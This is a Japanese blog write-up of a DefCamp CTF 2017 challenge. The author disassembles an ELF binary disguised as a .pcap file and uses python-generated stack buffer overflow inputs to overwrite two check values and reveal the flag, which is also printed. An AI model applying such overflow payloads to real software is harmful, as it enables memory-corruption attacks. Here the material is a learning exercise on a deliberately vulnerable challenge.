初のWrite Up書いてみる
最近内定式や卒研で忙しくて何もできていなかったので初のWrite Upを書きます!!
この前チームで参加したDefCamp CTF Qualification 2017の問題のWrite Upです。
How is your memory?
問題からファイルをダウンロードしてみるとmemory.pcap
が手に入った
pcapだったのでwiresharkで見てみるとELFという文字が見えたのでfileで確かめてみた
$ file memory.pcap memory.pcap: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=ffa14db28a5fdf190ee6b0b56af2c7b2cab9cdd5, not stripped
ELFだった、、、
早速動かしてみる
$ ./memory.pcap Oh well you do remember your extension! [You have sent this msg]: [Instead of 0xdeadbeef the target recived]: 0x4030201
なにも入力しないとこんな感じだった。
次はなにか入力してみる
./memory.pcap AAAAAAAAAAA Oh well you do remember your extension! [You have sent this msg]: AAAAAAAAAAA [Instead of 0xdeadbeef the target recived]: 0x4030201
自分が入力した値が表れた
さらに入力してみる
$ ./memory.pcap AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Oh well you do remember your extension! [You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA [Instead of 0xdeadbeef the target recived]: 0x41414141 Hey hey do not spam! Go home you are drunk!
今まで0x4030201だったのが0x41414141に書き換わっている つまり入力した値で書き換わった。
次は中身を解析してみる。
$ gdb -q ./memory.pcap Reading symbols from ./memory.pcap...(no debugging symbols found)...done. gdb-peda$ disas main Dump of assembler code for function main: 0x080486bb <+0>: lea ecx,[esp+0x4] 0x080486bf <+4>: and esp,0xfffffff0 0x080486c2 <+7>: push DWORD PTR [ecx-0x4] 0x080486c5 <+10>: push ebp 0x080486c6 <+11>: mov ebp,esp 0x080486c8 <+13>: push ecx 0x080486c9 <+14>: sub esp,0x64 0x080486cc <+17>: mov DWORD PTR [ebp-0xc],0x4030201 0x080486d3 <+24>: mov eax,ds:0x804a040 0x080486d8 <+29>: sub esp,0x4 0x080486db <+32>: push eax 0x080486dc <+33>: push 0x2d 0x080486de <+35>: lea eax,[ebp-0x34] 0x080486e1 <+38>: push eax 0x080486e2 <+39>: call 0x80484f0 <fgets@plt> 0x080486e7 <+44>: add esp,0x10 0x080486ea <+47>: sub esp,0xc 0x080486ed <+50>: push 0x8048950 0x080486f2 <+55>: call 0x8048540 <puts@plt> 0x080486f7 <+60>: add esp,0x10 0x080486fa <+63>: sub esp,0x8 0x080486fd <+66>: lea eax,[ebp-0x34] 0x08048700 <+69>: push eax 0x08048701 <+70>: push 0x804897c 0x08048706 <+75>: call 0x8048530 <printf@plt> 0x0804870b <+80>: add esp,0x10 0x0804870e <+83>: sub esp,0x8 0x08048711 <+86>: push DWORD PTR [ebp-0xc] 0x08048714 <+89>: push 0x804899c 0x08048719 <+94>: call 0x8048530 <printf@plt> 0x0804871e <+99>: add esp,0x10 0x08048721 <+102>: cmp DWORD PTR [ebp-0xc],0x4030201 0x08048728 <+109>: je 0x8048743 <main+136> 0x0804872a <+111>: cmp DWORD PTR [ebp-0xc],0xdeadbeef 0x08048731 <+118>: je 0x8048743 <main+136> 0x08048733 <+120>: sub esp,0xc 0x08048736 <+123>: push 0x80489cc 0x0804873b <+128>: call 0x8048540 <puts@plt> 0x08048740 <+133>: add esp,0x10 0x08048743 <+136>: cmp DWORD PTR [ebp-0xc],0xdeadbeef 0x0804874a <+143>: jne 0x8048865 <main+426> 0x08048750 <+149>: sub esp,0xc 0x08048753 <+152>: push 0x80489fc 0x08048758 <+157>: call 0x8048530 <printf@plt> 0x0804875d <+162>: add esp,0x10 0x08048760 <+165>: mov DWORD PTR [ebp-0xc],0xffffff 0x08048767 <+172>: sub esp,0x8 0x0804876a <+175>: lea eax,[ebp-0x34] 0x0804876d <+178>: push eax 0x0804876e <+179>: push 0x8048a64 0x08048773 <+184>: call 0x8048520 <scanf@plt> 0x08048778 <+189>: add esp,0x10 0x0804877b <+192>: sub esp,0x8 0x0804877e <+195>: lea eax,[ebp-0x34] 0x08048781 <+198>: push eax 0x08048782 <+199>: push 0x804897c 0x08048787 <+204>: call 0x8048530 <printf@plt> 0x0804878c <+209>: add esp,0x10 0x0804878f <+212>: sub esp,0x8 0x08048792 <+215>: push DWORD PTR [ebp-0xc] 0x08048795 <+218>: push 0x8048a68 0x0804879a <+223>: call 0x8048530 <printf@plt> 0x0804879f <+228>: add esp,0x10 0x080487a2 <+231>: cmp DWORD PTR [ebp-0xc],0xffffff 0x080487a9 <+238>: je 0x80487c4 <main+265> 0x080487ab <+240>: cmp DWORD PTR [ebp-0xc],0x41414242 0x080487b2 <+247>: je 0x80487c4 <main+265> 0x080487b4 <+249>: sub esp,0xc 0x080487b7 <+252>: push 0x80489cc 0x080487bc <+257>: call 0x8048540 <puts@plt> 0x080487c1 <+262>: add esp,0x10 0x080487c4 <+265>: cmp DWORD PTR [ebp-0xc],0x41414242 0x080487cb <+272>: jne 0x8048865 <main+426> 0x080487d1 <+278>: mov DWORD PTR [ebp-0x3e],0x33736461 0x080487d8 <+285>: mov DWORD PTR [ebp-0x3a],0x73647177 0x080487df <+292>: mov WORD PTR [ebp-0x36],0x78 0x080487e5 <+298>: mov DWORD PTR [ebp-0x43],0x46544344 0x080487ec <+305>: mov BYTE PTR [ebp-0x3f],0x0 0x080487f0 <+309>: mov DWORD PTR [ebp-0x47],0x414853 0x080487f7 <+316>: mov DWORD PTR [ebp-0x4b],0x363532 0x080487fe <+323>: mov DWORD PTR [ebp-0x5b],0x2168654d 0x08048805 <+330>: mov DWORD PTR [ebp-0x57],0x756f5920 0x0804880c <+337>: mov DWORD PTR [ebp-0x53],0x61676120 0x08048813 <+344>: mov DWORD PTR [ebp-0x4f],0x3f6e69 0x0804881a <+351>: sub esp,0xc 0x0804881d <+354>: push 0x8048a98 0x08048822 <+359>: call 0x8048540 <puts@plt> 0x08048827 <+364>: add esp,0x10 0x0804882a <+367>: sub esp,0x4 0x0804882d <+370>: push 0x8048ac3 0x08048832 <+375>: lea eax,[ebp-0x4b] 0x08048835 <+378>: push eax 0x08048836 <+379>: lea eax,[ebp-0x43] 0x08048839 <+382>: push eax 0x0804883a <+383>: push 0x8048ad1 0x0804883f <+388>: lea eax,[ebp-0x3e] 0x08048842 <+391>: push eax 0x08048843 <+392>: push 0x8048ad8 0x08048848 <+397>: lea eax,[ebp-0x3e] 0x0804884b <+400>: push eax 0x0804884c <+401>: lea eax,[ebp-0x4b] 0x0804884f <+404>: push eax 0x08048850 <+405>: lea eax,[ebp-0x47] 0x08048853 <+408>: push eax 0x08048854 <+409>: lea eax,[ebp-0x43] 0x08048857 <+412>: push eax 0x08048858 <+413>: push 0x8048adb 0x0804885d <+418>: call 0x8048530 <printf@plt> 0x08048862 <+423>: add esp,0x30 0x08048865 <+426>: mov eax,0x0 0x0804886a <+431>: mov ecx,DWORD PTR [ebp-0x4] 0x0804886d <+434>: leave 0x0804886e <+435>: lea esp,[ecx-0x4] 0x08048871 <+438>: ret
ここらへんを見ると、[ebp - 0xc]が上書きされている、かつ値が0xdeadbeefじゃないときにHey hey do not spam! Go home you are drunk!
と出力されるので
上書きしてあげて0xdeadbeefにすればここは通過できそう。
0x08048721 <+102>: cmp DWORD PTR [ebp-0xc],0x4030201 0x08048728 <+109>: je 0x8048743 <main+136> 0x0804872a <+111>: cmp DWORD PTR [ebp-0xc],0xdeadbeef 0x08048731 <+118>: je 0x8048743 <main+136> 0x08048733 <+120>: sub esp,0xc 0x08048736 <+123>: push 0x80489cc 0x0804873b <+128>: call 0x8048540 <puts@plt> 0x08048740 <+133>: add esp,0x10 0x08048743 <+136>: cmp DWORD PTR [ebp-0xc],0xdeadbeef 0x0804874a <+143>: jne 0x8048865 <main+426>
やってみる
$ python -c 'print("A"*40 + "\xef\xbe\xad\xde")' | ./memory.pcap Oh well you do remember your extension! [You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ� [Instead of 0xdeadbeef the target recived]: 0xdeadbeef Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough? [You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA��� [Instead of 0x41414242 the target recived]: 0xffffff
0xdeadbeefに書き換えてあげたらいけた。
次は同じように0xffffffを0x41414242に書き換えてあげれば良さそう
$python -c 'print("A"*40 + "\xef\xbe\xad\xde" + "A"*40 + "\x42\x42\x41\x41")' | ./memory.pcap Oh well you do remember your extension! [You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAᆳ� [Instead of 0xdeadbeef the target recived]: 0xdeadbeef Meh...you did it... but I am not sure you know what you did there... Again, is your memory good enough? [You have sent this msg]: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAA [Instead of 0x41414242 the target recived]: 0x41414242 Wow I am impressed! Now for the last time: DCTF{SHA256(ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration)}
flagっぽいのが出た
echo -n "ads3wqdsx<>ads3wqdsxprintfDCTF256mehgeneration" | sha256sum
フォーマットがDCTF{SHA256}だったので、これで出力したやつがflag
DCTF{33886bb08d43834495866481148c60bbf9b58421d1dd4849865e49fe444366c6}
CTFを本格的に初めてちょうど1ヵ月ぐらいですが、チームのみんなはすごい人ばっかりなので早く追いつきたいですね、、、
毎週チームで大会に参加しているのでまた書こうと思います!!!
では!